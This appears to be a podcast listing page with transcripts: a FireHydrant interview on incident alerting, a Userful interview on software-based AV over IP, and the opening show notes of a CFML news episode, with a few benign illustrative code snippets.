Robert: But I think when engineers are thinking, like, “I could build this on a weekend,” that's a moment when you have an opportunity to provide the value in an innovative, maybe consolidated way. We want to be a tool that's your incident management from ring to retro, right? You get paged in the middle of the night, we're going to wake you up, and when you open up your laptop, groggy-eyed, and, like, you're about to start fighting this fire, FireHydrant's already done a lot of work. That's what we think is, like, the right model to do this. And candidly, I have no idea why the other alerting tools in this space haven't done this. I've said that, and people tend to nod in agreement and say, like, “Yeah, it's kind of crazy how they haven't approached this problem yet.” And… I don't know, I want to solve that problem for folks.

Corey: So, one thing that I have to ask—you've been teasing it on the internet for a little bit now—is something called Signals, where you are expanding your product into the component that wakes people up in the middle of the night, which in isolation, fine, great, awesome. But there was a company whose sole stated purpose was to wake people up in the middle of the night, and then once they started doing some business things such as, oh I don't know, going public, they needed to expand beyond that to do a whole bunch of other things. But as a customer: no, no, no, you are the thing that wakes me up in the middle of the night. I don't want you to sprawl and grow into everything else, because if I'm going to have to pick a vendor that claims to do everything, well, I'll just stay with AWS because they already do that and it's one less throat to choke. What is the pressure that is driving companies that are spectacular at the one thing to expand into things that, frankly, they don't have the chops to pull off? And why is this not you doing the same thing?

Robert: Oh, man. The end of that question is such a good one, and I like that. I'm not an economist. I'm not—like, that's… I don't know if I have a great comment on why people are expanding into things that they don't know how to do. It seems to be, like, a common thing across the industry at a certain point—

Corey: Especially generative AI. “Oh, we've been experts in this for a long time.” “Yeah, I'm not that great at dodgeball, but you also don't see me mouthing off about how I've been great at it and doing it for 30 years, either.”

Robert: Yeah. I mean, there were a couple of ads during football games I watched where I'm like, “What is this AI thing where you just tacked the letter X onto the end of your product line and now all of a sudden it's AI?” I have plenty of rants that are good for a cocktail at some point, but as for us, I mean, we knew that we wanted to do alerting a long time ago, but it does have complications. Like, the problem with alerting is that it has to be able to take a brutal punch to the face the moment that AWS us-east-2 goes down. Because at that moment in time, a lot of webhooks are coming your way to wake somebody up, right, for thousands of different companies.
So, you do have to be able to take a very, very significant amount of volume instantaneously. So, that was one thing that kind of stopped us. Even in 2019, we wrote a product document about building an alerting tool, and we kind of paused. And then we got really deep into incident management, and the thing that makes us feel very qualified now is that people are actually already integrating their alerting tools into FireHydrant today. This is a very common thing. In fact, most people are paying for both FireHydrant and an alerting tool. So, you can imagine that gets a little expensive when you have both. So, we said, well, let's help folks consolidate, let's help folks have a modern version of alerting, and let's build on top of something we've been doing very well already, which is incident management. And we ended up calling it Signals because we think that we should be able to receive a lot of signals in, do something correct with them, put a signal out, and then transfer you into incident management. And yeah, we're excited for it, actually. It's been really cool to see it come together.
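The “punch to the face” requirement translates to a familiar pattern: acknowledge webhooks instantly and push the slow work onto a queue. A generic sketch of that shape, not FireHydrant's implementation:

```python
# Absorb webhook bursts: ack fast, process later. Generic pattern only.
import queue
import threading
from flask import Flask, request

app = Flask(__name__)
events: queue.Queue = queue.Queue(maxsize=100_000)  # bounded buffer for the burst

@app.route("/ingest", methods=["POST"])
def ingest():
    try:
        events.put_nowait(request.get_data())  # cheap enqueue, immediate ack
    except queue.Full:
        return "", 503  # shed load explicitly instead of timing out
    return "", 202

def worker() -> None:
    while True:
        raw = events.get()
        # ...parse, dedupe, and decide who to wake up (the slow part)...
        events.task_done()

threading.Thread(target=worker, daemon=True).start()
```

In production the in-process queue would be a durable broker, but the ingestion contract is the same: accept the flood first, think later.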
Corey: There's something to be said for keeping it in a certain area of expertise. And people find it very strange when they reach out to my business partner and me asking, okay, so are you going to expand into Google Cloud or Azure or—increasingly, lately—Datadog—which has become a Fortune 500 board-level expense concern, which is kind of wild to me, but here we are—and asking if we're going to focus on that, and our answer is no. Because it's very… well, not very, but it is relatively easy to be the subject matter expert in a very specific, expensive, painful problem, but as soon as you start expanding, your messaging loses focus, and it doesn't take long—since we do view this as an inherent architectural problem—before we're saying, “We're the best cloud engineers and cloud architects in the world,” and then we're competing against basically everyone out there. And Accenture or Deloitte spends more money a year on marketing than we'll ever earn as a company in our entire lifetime, just because we are not externally boosted, we're not putting hundreds of people into the field. It's a lifestyle business that solves an expensive, painful problem for our customers. And that focus lends clarity. I don't like the current market pressure toward expansion and consolidation at the cost of everything, including, it seems, customer trust.

Robert: Yeah. That's a good point. I mean, I agree. It's almost getting hard to tell what a company does based on its name anymore. Like, names don't even mean anything for companies anymore. Datadog has expanded into a whole lot of things beyond data, and if you think about some of the alerting tools out there named after old devices that used to attach to our hips, that name no longer represents what they do.

And I think for us, like, incidents—that's what we care about. That's what I know. I know how to help people manage incidents. I built software that broke—sometimes I was an arsonist, sometimes I was a firefighter, it really depends—but that's the thing that we're going to be good at, and we're just going to keep building in that sphere.

Corey: I think that there's a tipping point that starts to become pretty clear when companies focus away from innovating and growing and serving customers into revenue protection mode. And I think this is a cyclical force that is very hard to resist. But I can tell, even having conversations like this with folks, by the way that a company goes about setting up one of these conversations with me. You came by yourself, not with a squadron of PR people, not with a whole giant list of talking points you wanted to hit—just, “Let's talk about this stuff. I'm interested in it.”

As a company grows, that becomes more and more uncommon. Often, I'll see it at companies a third the size of yours, just because there's so much fear that everything said must be spoken in such a way that it could never be taken negatively against them. That's not the failure mode. The failure mode is that no one listens to you or cares what you have to say. At some point, yeah, I get the shift, but damned if it doesn't always feel like it's depressing.

Robert: Yeah. These are such great questions, because the way I think about it is: I care about the problem, and if we solve the problem, and we solve it well, and people agree with us that our solution is a good way to solve that problem, then the revenue, like, happens because of that. I've gotten asked by VCs and customers, like, “What's your end goal with FireHydrant as the CEO of the company?” And what they're really asking is, “Do you want to IPO or be acquired?” That's always the question, every single time.

And my answer is, maybe, I don't know, philosophical, but it's: I think if we solve the problem, like, one of those will happen, but that's not the end goal. Because if I aim at that, we're going to come up short. It's like how they tell you to throw a ball, right? They don't say aim at the glove. They say, like, aim behind the person.

And that's what we want to do. We just want to aim at solving a problem, and then the revenue will come. You have to be smart about it, right? It's not a field of dreams—like, if you build it, revenue arrives—so you do have to be conscious of the business and the operations and the model that you work within, but it should all be in service of building something that's valuable.

Corey: I really want to thank you for taking the time to speak with me. If people want to learn more, where should they go to find you, other than, you know, their most recent incident page?

Robert: [laugh]. No, thanks for having me. So, to learn more about me, you can find me on Twitter—or X. What do we call it now?

Corey: I call it Twitter because I don't believe in deadnaming, except when it's companies.

Robert: Yeah [laugh]. twitter.com/bobbytables if you want to find me there. If you want to learn more about FireHydrant and what we're doing to help folks with incidents and incident response and all the fun things in there, it's firehydrant.com or firehydrant.io, but we'll redirect you to dot com.

Corey: And we will, of course, put a link to all of that in the [show notes 00:33:10]. Thank you so much for taking the time to speak with me. It's deeply appreciated.

Robert: Thank you for having me.

Corey: Robert Ross, CEO and co-founder of FireHydrant. This featured guest episode has been brought to us by our friends at FireHydrant, and I'm Corey Quinn.
If you've enjoyed this podcast, please leave a five-star review on your podcast platform of choice, whereas if you've hated this podcast, please leave a five-star review on your podcast platform of choice, along with an insulting comment that will never see the light of day because that crappy platform you're using is having an incident that they absolutely do not know how to manage effectively.

Corey: If your AWS bill keeps rising and your blood pressure is doing the same, then you need The Duckbill Group. We help companies fix their AWS bill by making it smaller and less horrifying. The Duckbill Group works for you, not AWS. We tailor recommendations to your business and we get to the point. Visit duckbillgroup.com to get started.

Sixteen:Nine
Shane Vega, Userful

Sixteen:Nine

Play Episode Listen Later Jul 26, 2023 37:12


The 16:9 PODCAST IS SPONSORED BY SCREENFEED – DIGITAL SIGNAGE CONTENT

Using existing network infrastructure has long been talked up as an efficient way to manage and deliver digital signage solutions in large companies, but the concept has been clouded by concerns - like the cost of additional AV hardware and the impact of all that video on the company network. But we now live in a world where companies support countless video conferencing sessions with piles of users, with little or no latency. Other technologies have also caught up, and computing just keeps getting more powerful.

Which is why I was interested in chatting with Shane Vega, VP of Marketing for the Silicon Valley software firm Userful, about his company's AV over IP solutions. The company has its roots in Calgary, Alberta and still does a lot of the R&D work there. Userful first showed up in digital signage circles talking about a different way, using software and endpoints, to drive video walls. But in the last few years it has been much more focused on a broader IP-driven solution that tends to start with control rooms and operations centers, but can also drive things like meeting room displays and digital signage around corporate campuses.

There's been a lot of discussion about AV needs converging with IT interests, but from Vega's perspective, that convergence is already firmly in place.

Subscribe from wherever you pick up new podcasts.

TRANSCRIPT

Shane, thank you for joining me. Where are you today?

Shane Vega: I am in sunny Tampa, Florida, where although it's not all that sunny today, we've got some rain, but that's per the norm now.

Now, Userful is in Silicon Valley, but a lot of the developers are in Calgary, right?

Shane Vega: Yeah, that's correct. All of our R&D, engineering team, and the like, they're all up in Calgary, Canada.

So you're missing the Calgary Stampede this week?

Shane Vega: I am missing the Stampede. But you know what, I believe they deserve a bit of a good time, because they spend the majority of the year avoiding the minus 30-degree weather.

Yeah, I spent a number of years in Calgary, and it's an interesting weather city.

Shane Vega: Yeah. You know it's bad when they've developed an entire infrastructure of walkways between buildings to avoid having to go outside.

Yeah, just like Minneapolis.

Shane Vega: Exactly.

All right, so we had a quick chat in the LG booth at Infocomm, and you explained what Userful was up to with its Infinity platform and AV over IP and AV as a Service and so on, and I've seen that. I will wholeheartedly admit I don't totally get it, but how you explained it to me was very interesting, and I thought this would be useful for a lot of people to understand the infrastructure and distribution side of digital signage.

We spend so much time talking about the content and business strategy and all those sorts of things, but the behind-the-scenes stuff is awfully important, and maybe we could start out by just explaining what Userful is and does and where you came from, because when Userful first came out, it was presented to me as video wall software, and I had a hell of a time wrapping my brain around what it was all about. But I know you guys have evolved quite a bit.

Shane Vega: Yeah. I appreciate that, Dave. To answer your question, Userful has grown exponentially in the last 5+ years. John Marshall, our CEO, came on board about 7 years or so ago.
My timing might be a little bit off, and when he came into the organization, we were a perpetual software company, so we weren't software as a service, we weren't selling subscriptions. We were selling perpetual software…

You'd buy a license and then get that supported?

Shane Vega: Yeah, you'd buy a license, then we'd support it for the duration of however long you wanted to use it, and the licensing for the software was pretty siloed, right? It was, “Hey, you can buy this operations center license.” Where, to your point, we were just managing content on a video wall.

And it was mostly control rooms, right?

Shane Vega: Mostly control rooms, almost exclusively for a time, and then we evolved into the digital signage world, and it was cloud-based digital signage exclusively. So what most folks are familiar with is hosting up in AWS, giving you some access to dynamic tools for creating templates and the like.

As for what we launched during Infocomm: from the time that I just mentioned until about two and a half or three years ago, we pivoted the company from perpetual licenses to subscription-based software as a service, and that's who Userful is. We are a software company, and we've been a software company tailored to the needs of the AV industry.

Most recently, we've just released our newest platform, and that's really been the biggest evolution: moving away from application-specific deployments into more of a platform approach for AV over IP, and that is really the biggest breakthrough development that we've had here. Because in the older version of our software, we were a monolithic code base. Again, we were just selling either the operations center software or we were selling some digital signage. Everything was monolithic. It was difficult for our engineering team to manage updates, firmware, bug fixes, and the like. We've now moved to a distributed code base that has given us exceptional flexibility in how we develop our software for the various use cases and applications in the AV industry.

So if you think about what you've seen in the conversations you and I have had—essentially, and you hit the nail right on the head, this isn't just about fancy software managing content on a video wall. Can we do that? Of course; we've got feature sets for various different use cases. But there's also the infrastructure piece, and this was my “aha moment” through a different lens at Infocomm.

AV over IP has matured through the years, from IP-addressable matrix switchers, where everything was still very much centralized, into IP-addressable nodes—encoders, decoders, transmitters, receivers—and all the different AV manufacturers out there have now standardized on this proprietary hardware version of AV over IP. And I started to ask myself the question: what is their value proposition in doing that? I overheard quite a few folks during this past Infocomm talk about the value of this distributed architecture: enabling flexibility, scalability, augmenting workflows, the total cost of ownership being lower. And I sat there a little bit baffled, because these are all the same things that we talk about at Userful. So it really opened up an area where I feel like we do need to evangelize a little bit more about how Userful does AV over IP differently, in that we don't necessitate all of the hardware infrastructure. We truly are a software platform, but because of the IT protocols that currently exist, that's how we developed our software.
So when you think about Userful, I've actually positioned us a little bit more as an IT solution than an AV solution, even though our entire solution is built around the AV industry and its needs. The reason I say that is because we're literally a server, non-proprietary, and an endpoint, and that endpoint is software: our uClient application. In between the two is network infrastructure. There are no encoders, decoders, transmitters, receivers, and the list goes on. Because we are able to transmit content and aggregate content—meaning we can pull sources of visual and audio information into a data library or data store that we manage on our server and distribute that information to any destination or any screen—and we do that all with IP protocols.

The same IP protocols, by the way, and this is how I usually get people to have the “aha moment”: if we were having this over a Teams meeting, Dave, or a Zoom meeting, we would be transmitting video two ways. In many cases, multiple participants from multiple regions of the world share two-way audio and video. We would be able to share content from our local computers into that meeting, and nobody would have to go out and buy a proprietary encoder and decoder to make that happen. So using that same infrastructure, or those IP protocols that are currently at work—IP protocols like WebRTC, for instance—we're able to build a solution that leverages those same advancements for the purposes of AV over IP. It's a bit of a mouthful, but that's what we're doing.

So you wouldn't have been able to do some of that 10-15 years ago, because the network infrastructure in a lot of larger corporations hadn't really caught up with that, so you would flood a network if you were using a lot of video and so on, but things have changed.

Shane Vega: Things have changed substantially, and I would even say it's been not even 10-15 years ago, just 5-10 years ago. The reason I say that is because there are the laws of engineering and physics, like Butters' Law, Kryder's Law, and Moore's Law, which talk about how rapidly these advancements are happening: fiber optic networks doubling their capacity every nine months, the amount of bandwidth that you can get through a fiber optic cable, the amount of processing speed that you can get out of a CPU.

What we're doing, and the way that we're doing it, taxes the CPU of that server. It also taxes the GPU of that server, the graphics card, because those are the two major components that we use for our solution. If you think about it, just two years ago, Dave, the servers that we were deploying in the field had 8 processor cores. Right now, I have a server that we've certified that has 192 cores, so we're able to do exceedingly more on a single server, which is why we've actually built our solution to be a data center solution by and large, where you take a big beefy server, you put it in your data center, and you're virtualizing all of the traditional hardware that you would need, and you're managing a wide range of AV endpoints, whether it's digital signage, meeting rooms, operations centers, or what have you.

Is there a baseline for what you need in terms of the network infrastructure? I'm definitely not an IT architect, but do you need CAT6E, or can you do this over WiFi? I don't know, and I suspect a lot of people don't know.

Shane Vega: Yeah, so it's a good question.
So again, because we're optimizing for IT protocols, we're able to do a lot, right? From the screen to the switch, we're just really looking for that one-gigabit uplink, which is standard. Most folks are going to have that. From the sources to the server, and all that infrastructure pulling into the server, we're looking for a 10-gigabit uplink.

So there are some requirements for the network, but nothing that is outside the realm of standard network topology. The real intricacies, or the real areas where we get into some deeper discussions, are when they have multiple networks that we have to traverse. When you start getting into DOD environments, where things have to be air-gapped and there's no internet connectivity, and when networks start to get a little bit more complex, that's where we have to begin to get a little bit more intentional about how we design it. Now that said, we haven't yet met a deployment whose network requirements we couldn't meet, even though some of those were complex ones.
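Those two uplink numbers are easy to sanity-check with back-of-the-envelope math. Assuming a typical compressed 1080p stream around 8 Mbps (my assumption for illustration, not Userful's figure):

```python
# Rough stream-count math; 8 Mbps per 1080p H.264 stream is an assumption.
uplink_screen_mbps = 1_000    # 1 GbE from the switch to a screen
uplink_server_mbps = 10_000   # 10 GbE into the server

stream_mbps = 8
print(uplink_screen_mbps // stream_mbps)  # ~125 streams fit the screen-side link
print(uplink_server_mbps // stream_mbps)  # ~1250 streams fit the server-side link
```

Which is the underlying point: ordinary office-grade links now have headroom that would have been unthinkable when AV over IP required dedicated hardware at every hop.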
There were two things that particularly interested me. The first was, as you laid out earlier, that you don't need all these encoders and other bits of hardware to layer into a network to make this happen, so you're cutting out conceivably a lot of capital costs and a lot of potential fail points. And I guess the other thing that intrigues me, and you can talk about that next, or after, is the idea that you can use this for multiple applications. I suspect there are control room data dashboards and software platforms out there, but one of the things you talked about at Infocomm is that you can cascade this out to do all kinds of different things, from operation centers to experience centers, off of the same platform.

Shane Vega: Yeah, exactly, Dave, and to answer the first question, you hit the nail on the head with one of my areas of confusion when I was at Infocomm: I heard people talking about the low total cost of ownership, and they were tying it to these encoders and decoders. We don't require those things. So when I think about the total cost of ownership, I think about the hardware costs up front that you don't need to have, and the additional BTU output from all of that hardware that you would normally need, which is no longer going to be there, which would otherwise drive your HVAC costs, right? You don't have all the power consumption. So for companies who are pursuing green initiatives—and this is a big one moving forward, folks want to be more green—lower carbon emissions and lower power consumption from not having all that hardware are yet another total cost of ownership benefit for Userful.

Again, our encoding happens at the one server that we require, in that Nvidia graphics card. The decoding is done by a piece of software we developed called the uClient application. Now, where that uClient application resides, we give you tons of flexibility. We have integrated it into certain endpoints like webOS or Tizen or Android. And that gives us the flexibility to be able to load that client application in various different environments and use cases, depending on the display type—if it's an LCD, if it's a direct view LED—and how we manage that.

In some cases, we do have a small appliance that you might need at the edge, and that would be one additional piece of hardware per display, depending on the display type, and that's an Android box that we load our uClient application onto if the display doesn't have the ability to integrate with our software.

So if it's a smart display that already has a system on a chip in it, conceivably you don't need that Android box?

Shane Vega: Correct. So now what you're left with, as I said, is just a server, with software at the edge and network infrastructure in between. So ongoing maintenance costs are substantially lower. Initial hardware costs are lower. Your total cost of ownership around all the things I mentioned earlier is going to be lower. Therefore, your refresh costs are going to be lower, because with hardware, every three to five years—in some cases five to seven years—you're having to do a hardware refresh. It's always tied to CapEx because it's usually proprietary. They have to budget for CapEx renewals of all this hardware.

Because of Userful's deployment model, we can take on an OPEX model for those folks who would benefit from that, because your hardware refresh can be built into your standard IT refreshes, because you own the hardware. In as many cases as we can possibly push for, we don't provide the server; we want the end user to provide the server, and that way it gets built into your traditional OPEX refresh, and the only recurring cost is the software.

To your next question, about the benefits of the platform: this is where our software really begins to shine, right? Our platform is accessible through a web browser, so no proprietary software needs to be downloaded for a user to access it. You access our software through a traditional HTML5 web browser.

Once you access the software through a web browser, the first thing you're going to notice is we have six applications that any user can take advantage of. In most cases, folks aren't trying to eat the elephant whole, right? They'll have a use case like digital signage, or they'll have a use case like meeting rooms or experiential centers or what have you, and that's one of the reasons why we are licensing the server. We're licensing the CPU cores and the number of graphics cards that you need on that server, so that if you have a smaller use case, your out-of-pocket costs are going to be lower because you need a smaller server. But when you log in for the first time, you're going to see, “Oh, I got this for digital signage, but I didn't know I could run my meeting room here,” or, “I didn't realize that I can do these artistic video walls,” or, “I didn't realize I can incorporate these data dashboards from Power BI or Tableau as a native source and share those to any display that Userful is managing.”

The value is seen almost immediately, and so what we do is try to help people understand the peripheral or parallel use cases. I use digital signage quite a bit, and I gave you this analogy regarding airports at Infocomm, Dave, where at least half a dozen times in the last six to eight months, I've had conversations with various airports, and most of them are pulling us in because they have an operation center.
Airport operations center, or security operations center, or what have you, and they'll say, “Hey, we want the Userful software to run the content on these displays and video walls in the operation center.” And when we have these discovery calls, I'll typically ask, “Hey, have you guys thought about the advantages of using our platform to help you with the signage?” And I'm usually shot down rather immediately. Most folks know airports are convoluted in the way that they deploy their technology. They've got various different groups. They're typically siloed. But specifically with the airport operations centers, I'll just say, “Hey, look, I get that, but let me just throw this use case out there and see if it lands and strikes you as showing value.”

You're in an airport operations center. Wouldn't you want to be able to manage the entire network of screens that are currently being used to show baggage, arrivals, departures, signage, and all your wayfinding screens? Would it not be valuable to be able to manage those as part of your airport operations? Also, I've noticed in many cases they'll incorporate security into their AOC. Some of them have independent security operations centers, but in either event, I would tell them: what happens if you have an incident at the airport? Wouldn't you want to be able to take over those screens from the command center that's responsible for monitoring and sending strategic messages to people, depending on what the situation is? If there's a fire, “evacuate.” If, God forbid, there's an active shooter, “take shelter in place.” Wouldn't you want to be able to send strategic messages to various screens, all from within your operation center? Well, you can't currently do that, because you've got multiple systems driving all of these different AV endpoints.

If you had a single platform, it doesn't just give you the ability to scale your deployment; it gives you the ability to scale your workflow and become more flexible, to augment those workflows so I can send strategic messages to screens, and I can manage arrivals and baggage from my AOC if that's such a thing that I need. In addition, we could help you with your meeting rooms. You can walk into a meeting room, and I can help you cast some content and have an impromptu meeting at the drop of a dime. Those are just a few use cases of what our platform can do.

Sometimes, when you have these platforms that say they can do, in your case, at least six different things, there can be compromises. In other words, “Yeah, we can do all these things. It's just that none of them are particularly deep, or maybe one of them is deep, and the other ones are so-so.” Do you get that question at all?

Shane Vega: Ironically, no. We don't get that question. But it's a question most people should be asking, David, and I'll tell you that when that does come up, and it's only come up a handful of times, I'm always very candid about what we can't do as well as what we can do. And there is truth in the fact that we are software as a service, and so there are certain applications that still have roadmap features, candidly, that we're going to continue to augment and build out.

As you can probably imagine, the top three or four of our use cases would be: operations centers, digital signage, meeting rooms, and data dashboards. We do those very well. With experiential environments, we manage those artistic video walls very well.
Now, when you talk about experiential environments, there are some things that some folks might want to get involved with where we might have to have some deeper conversations, right? And that really is around interactivity. Do you want multi-touch video walls, like in a museum for kids or something like that? There we have some roadmap items to help ensure that multi-touch is what people would expect, where you don't want to have the lag, you don't want to have any of those issues when people are trying to have that fun experience as a child or what have you. So there are certain features that are still roadmap items.

But what I will bookend that with is: before coming over to Userful, I worked with one of the larger AV firms globally, and while I worked there, part of my interaction with customers was, “Man, I wish I could do more of these things with a single solution; I have to farm it out to so many folks.” But more than that, I would have feature requests for the stuff that was out there, and it was always in one ear, out the other. I don't care which manufacturer it was. If I went to some of these larger manufacturers and I said, hey, you really would benefit if you did this or this, it just didn't go anywhere. And then I had a similar conversation with Userful back in about 2018 at a trade show. I said, look, your software is good, but it really needs these four or five things to really be a competitor in the space that you're looking to deploy into, which at the time was operation centers.

I'd say if it was six months, it was a long time. So within six months, I got a call from the then VP of Sales, who said, “Hey, I want to have a meeting with you, Shane. We've incorporated all of your requests into our software,” and that really pivoted my approach to looking at Userful as: alright, these guys are the future of AV. And, little FYI, we actually got that award at Infocomm, the Future of AV award.

But the reason for that was: look, if we're going to be software as a service, then we have to prioritize feature requests from our customers above our own market research or our own gut check. And so that's part of my role here at Userful as VP of Marketing: I'm also over Product Marketing, which is over the roadmap, and so I get involved in customer calls quite a bit, and I'll hear some of these feature requests that, to your initial question, go deeper with these applications. I look for that feedback, and then I get to go back to the roadmap and go, “Hey, we need to prioritize this, this, and this feature. Push out the other features to the next release. Let's get these done because it's revenue dependent. We've got customers who would value this. Let's get it done!” We take that very seriously here at Userful, and we're at four releases a year, so you'll never have to wait all that long.

So you referenced airports. I'm curious, in the context of third-party software development: if there's a software company that works in the airport realm but isn't doing digital signage or some of the things you do, and they want to visualize information on displays, is there an API or something that they could develop against to work with Userful, or does it have to be Userful development to add that capability on?

Shane Vega: We have an entire program around APIs. So we do have our own API (currently it's a REST API), so we can receive tons of different messages and calls to trigger certain reactions within our software. But additionally, that's got its own roadmap in and of itself.
So we have our software application roadmap, and then we have our API roadmap, where we're going to be developing even deeper integrations and capabilities, including, but not limited to, wanting to create easy configuration tools so customers can use our API to do whatever they want, on site.

Are control rooms and operations centers the gateway, the initial point of contact, the thing that gets people interested, and then other things cascade out of that?

Shane Vega: That has been our experience. We call that our land. So we're land-and-expand through our platform. Let's find the use case. Let's land where it makes sense, and then let's show the power of our expansion. Just because of how the company has evolved, operation centers have been kind of the tip of our spear, and it makes sense, because operation centers will use two or three of our applications out of the gate, right? They'll use the operation center software; they'll use meeting rooms for war rooms or situation rooms. They'll also use our trends for dashboards and Power BI integrations, depending on what type of operation center it is. So they usually get value from several of our use cases and applications out of the gate. And if it's a large enough organization, and we're typically targeting LDOs (large distributed organizations), they'll have multiple operations centers, which gives us multiple points of connection and interaction and engagement to open up opportunities to talk about the meeting rooms beyond your war room and situation room. Or some operation centers are fishbowls, where they want to bring folks into their data center and they just want to use it as a showpiece to show their customers how well they manage their data, and so they might have welcome screens outside, and we'll let them know, “Hey, we can manage those welcome screens for you as well,” and that evolves into a larger digital signage strategy, corporate communications, and so on and so forth.

These large organizations, do they have separate AV and IT departments, or are they pretty much hiving into IT now?

Shane Vega: So more and more, IT is taking over. What's happening is, it used to be that they'd have AV specialists on staff, and by and large it was for the meeting rooms, and in some cases the digital signage, where they had AV technicians or AV specialists on-site, and those were the guys who were the gatekeepers deciding what technology gets deployed.

Yeah, and getting everything working before the meeting starts, somehow.

Shane Vega: Exactly. “Who's got HDMI? Who's got DVI?” So to that point, people keep talking about the convergence of AV and IT, and I don't know why. That convergence happened years ago. People are now starting to realize that because of that convergence, the IT organization or the IT departments within these larger organizations are going to be the ones holding the budget and the ones responsible for managing any AV resources on the network. And so we have intentionally built our product to cater to those IT stakeholders in the organization. When you say things like, “Hey, you can centrally monitor the entire platform from a web browser,” they really get that, right? When you say, “We're an IT solution, we're not an AV solution, which means we're not going to put all this IP-addressable hardware on your network,” a lot of the walls come down from their security concerns. You then begin to tell them that, look, you can augment your role-based access control and integrate with LDAP.

Plus, we give you tools that are IT-specific to help you monitor things like: what is the impact on my network? What is my current CPU utilization, or what's my current GPU utilization on the server that we're licensing? We give them all of those tools built into our software. So it's not just AV end-user tools that we're giving. We're also giving those IT tools that help the IT stakeholders manage deployments, because we recognize these are going to be larger in scale. They're going to be responsible for a lot. Let's make it easy for them.
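For anyone who hasn't wired this up before, “integrate with LDAP” for role-based access usually means binding with a service account and resolving a user's group memberships. A generic sketch using the Python ldap3 library; the server, DNs, and credentials are all placeholders, and nothing here is Userful-specific:

```python
# pip install ldap3 -- generic LDAP group lookup for role mapping.
# Server, DNs, and credentials below are placeholders.
from ldap3 import Server, Connection, ALL

server = Server("ldap.example.com", get_info=ALL)
conn = Connection(
    server,
    user="cn=svc-av,ou=service,dc=example,dc=com",
    password="change-me",
    auto_bind=True,
)

# Which groups contain this operator? Map group names to in-app roles.
conn.search(
    "ou=groups,dc=example,dc=com",
    "(member=uid=jdoe,ou=people,dc=example,dc=com)",
    attributes=["cn"],
)
roles = {str(entry.cn) for entry in conn.entries}
print("wall-operator" in roles)
```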
When you talk about AV as a service, it's a term I've heard for a while, but you guys go at it quite a bit differently, from what you're saying.

Shane Vega: Yeah, we do, and Dave, I struggle with that, because we were flirting with the term AV as a service, and we started to use it quite a bit. But I know, coming from the integration world, that AV as a service historically meant: we're going to just finance this stuff, right? We're going to get a leasing program, and we're going to build the hardware, the software, the services, whatever we can, into a monthly payment that makes it nice and easy for you guys. We approach it differently by saying: we are software as a service that's for the AV industry. Therefore, we are AV as a service, meaning we don't have all that hardware that you have to purchase. You're truly able to deploy all of these AV use cases and manage an entire host of AV applications from within our platform. And we are software that you pay for on subscription, typically three-year plans.

That's what we mean when we say AV as a service. It's exactly that: software as a service (which is the actual term) for the AV world.

This strikes me as something that probably has a learning curve, as every software platform does, but is it almost something you kind of have to ease your way into?

Shane Vega: Believe it or not, not really, and I think that would be more pertinent if somebody wanted to say, “Hey, I want to use your entire platform right now.” But as I said earlier, most folks are saying, “Hey, I want this operation center,” and they're familiar with operations center software. They know what they want. They know they want to be able to build custom layouts. They want to manage big, beautiful video walls. They want to be able to interact with sources with soft-KVM functionality, so that they're not just visualizing the sources but can engage with them, because they've got tools, right? They've got video management tools, and they've got access control, what have you. And so the software that we're providing isn't going to look and feel a whole lot different than a lot of the other software they're used to using.

Now, we do it differently. So the real benefit, rewinding all the way back to the beginning of this conversation, is: yes, we're giving you all these software applications and features, but it's the infrastructure that really differentiates us.

Along with removing different hardware components from this kind of network, you're also removing potentially different software applications that you'd otherwise need, because you've got this stack of different things you can do?

Shane Vega: Yeah, exactly. To that point, Dave, when I showed this at Infocomm, when I gave my demos there: typically when you deploy an AV solution, let's call it digital signage, that's the background that you're most familiar with.
In digital signage, let's say you use it for corporate communications; you'll have screens all over the office. In some cases, they'll want to be able to integrate that digital signage into their meeting rooms as well, and when the screens are in standby mode, they want some of those corporate communications to be part of the digital signage strategy managing those meeting rooms. But when you go into the meeting room, they'll typically need some type of infrastructure to support those meetings and local collaboration. Usually it's a network of AV infrastructure: HDMI cables, or what have you, going into some form of matrix switch, and there's going to be some type of tablet controller that gives you the ability to manage which laptop is being viewed on which screen.

With Userful, because the software does so much, the screens that we manage are not tied to any one specific application, and that's really the beauty of it. So I can walk into a room where they're showing corporate communications. I can sit down, open my laptop, and immediately start a meeting by screencasting whatever's on my laptop onto the screen in that room without connecting a single AV cable. I could then open up my operations center software on that same screen and turn it into an impromptu war room or situation room, where I'm pulling in multiple sources, building out customized layouts, and navigating through a crisis. So there are a lot of things that we can do, and it's not dependent on the screen, and, to your point, we've reduced not just the hardware need but the software as well.

All right, Shane, that was super interesting. I know much more about this space than I did half an hour ago.

Shane Vega: It's been great talking to you, Dave. I appreciate it.

Modernize or Die ® Podcast - CFML News Edition
Modernize or Die® - CFML News Podcast for June 6th, 2023 - Episode 197

Modernize or Die ® Podcast - CFML News Edition

Play Episode Listen Later Jun 6, 2023 77:46


2023-06-06 Weekly News - Episode 197

Watch the video version on YouTube at https://youtube.com/live/EgfBsmtKEWc?feature=share

Hosts:
Gavin Pickin - Senior Developer at Ortus Solutions
Brad Wood - Senior Developer at Ortus Solutions

Thanks to our Sponsor - Ortus Solutions
The makers of ColdBox, CommandBox, ForgeBox, TestBox and all your favorite box-es out there. A few ways to say thanks back to Ortus Solutions:
Like and subscribe to our videos on YouTube.
Help ORTUS reach for the Stars - Star and Fork our Repos
Star all of your GitHub Box Dependencies from CommandBox with https://www.forgebox.io/view/commandbox-github
Subscribe to our Podcast on your Podcast Apps and leave us a review
Sign up for a free or paid account on CFCasts, which is releasing new content every week
BOXLife store: https://www.ortussolutions.com/about-us/shop
Buy Ortus's Books
102 ColdBox HMVC Quick Tips and Tricks on GumRoad (http://gum.co/coldbox-tips)
Learn Modern ColdFusion (CFML) in 100+ Minutes - Free online https://modern-cfml.ortusbooks.com/ or buy an EBook or Paper copy https://www.ortussolutions.com/learn/books/coldfusion-in-100-minutes

Patreon Support
We have 40 patrons: https://www.patreon.com/ortussolutions. Big thanks to Kevin Wright, who just made a huge BUMP to their Patreon pledge amount.

News and Announcements

Ortus Training - ColdBox Zero to Hero
October 4th and 5th
Venue confirmation in progress - will be less than 2 miles from the Mirage.
Registration will be open soon!

CF Camp Pre Conference Workshop Discount
We can offer a 30% discount by using the code "OrtusPre30". Thank you for your ongoing support!
https://www.eventbrite.com/e/cfcamp-pre-conference-workshops-by-ortus-solutions-tickets-641489421127

ICYMI - Into the Box - Recap
ITB Recap Video - https://www.youtube.com/watch?v=XVoIZkJd8HE

New Releases and Updates

Lucee 5.4.0.65 Release Candidate
